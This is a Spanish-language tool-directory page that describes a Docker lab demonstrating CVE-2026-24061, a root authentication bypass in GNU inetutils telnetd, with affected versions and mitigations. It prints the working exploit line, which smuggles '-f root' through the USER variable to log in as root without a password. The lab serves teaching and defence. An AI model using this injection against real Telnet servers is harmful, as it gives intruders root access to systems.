Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
telnet-inetutils-auth-bypass-CVE-2026-24061 — Este es un PoC simple que te permite resaltar la gravedad del bug de Telnet actualmente activo y explotado que está ocurriendo en este momento. Por qué la gente sigue usando Telnet... no lo entiendo. | Kitploit
Herramientas/GitHubGitHub/jakeswiz/telnet-inetutils-auth-bypass-cve-2026-24061
Seguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubjakeswiz/telnet-inetutils-auth-bypass-cve-2026-24061

telnet-inetutils-auth-bypass-CVE-2026-24061

Este es un PoC simple que te permite resaltar la gravedad del bug de Telnet actualmente activo y explotado que está ocurriendo en este momento. Por qué la gente sigue usando Telnet... no lo entiendo.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
1hace 6 mesesAún no revisado

CVE-2026-24061: Omisión de Autenticación en GNU inetutils-telnetd

Un laboratorio Docker para demostrar CVE-2026-24061 — una vulnerabilidad crítica de omisión de autenticación en GNU inetutils telnetd que permaneció sin parchear durante 11 años.

La Vulnerabilidad

Telnetd pasa la variable de entorno USER directamente a /usr/bin/login sin saneamiento. El binario login tiene una bandera -f que omite la autenticación (destinada a sesiones pre-autenticadas). Al establecer USER='-f root', un atacante engaña a login para que conceda acceso root sin contraseña.

Versiones afectadas: GNU inetutils 1.9.3 (marzo de 2015) hasta 2.7 Puntuación CVSS: 9.8 (Crítica) Solución: Actualizar a inetutils 2.8+

Inicio Rápido

root@kitploit:~
# Construir la imagen
docker build -t telnetd-exploit .

# Ejecutar el contenedor (te lleva a una shell como user1)
docker run --rm -it telnetd-exploit

# Explotación — obtener root sin contraseña
USER='-f root' telnet -a localhost

Aterrizarás en una shell root. Ejecuta whoami para confirmarlo.

Cómo Funciona

root@kitploit:~
1. El cliente se conecta con: USER='-f root' telnet -a localhost
2. telnetd recibe la variable de entorno USER: "-f root"
3. telnetd ejecuta: /usr/bin/login -f root
4. login interpreta -f como "omitir autenticación, el usuario está pre-verificado"
5. El atacante obtiene una shell root — sin necesidad de contraseña

Por Qué Existe -f

La bandera -f es legítima — está destinada a escenarios donde un usuario ya está autenticado (por ejemplo, desde una sesión local de confianza). El error es que telnetd no saneamiento la variable USER antes de pasarla a login, permitiendo a atacantes remotos inyectar la bandera.

Impacto

A enero de 2026:

  • ~800,000 servidores Telnet expuestos globalmente (Shadowserver)
  • ~290,000 indexados en Shodan
  • Vulnerabilidad explotada activamente en la naturaleza (catálogo KEV de CISA)

Por Qué No Deberías Usar Telnet

Incluso sin este error, Telnet transmite todo en texto plano — incluidas las contraseñas. Usa SSH en su lugar.

ProtocoloCifradoAutenticación
TelnetNingunoTexto plano
SSHSíClave/Contraseña

Archivos

root@kitploit:~
.
├── Dockerfile              # Construye el contenedor Debian vulnerable
├── docker-entrypoint.sh    # Inicia inetd, cambia a user1
└── README.md

Mitigación

  1. Actualizar a GNU inetutils 2.8+
  2. Deshabilitar telnetd — bloquear el puerto 23
  3. Usar SSH — estamos en 2026

Referencias

  • CVE-2026-24061
  • Aviso Original
  • Entrada KEV de CISA

Créditos

Laboratorio basado en leonjza/inetutils-telnetd-auth-bypass

Descargar herramienta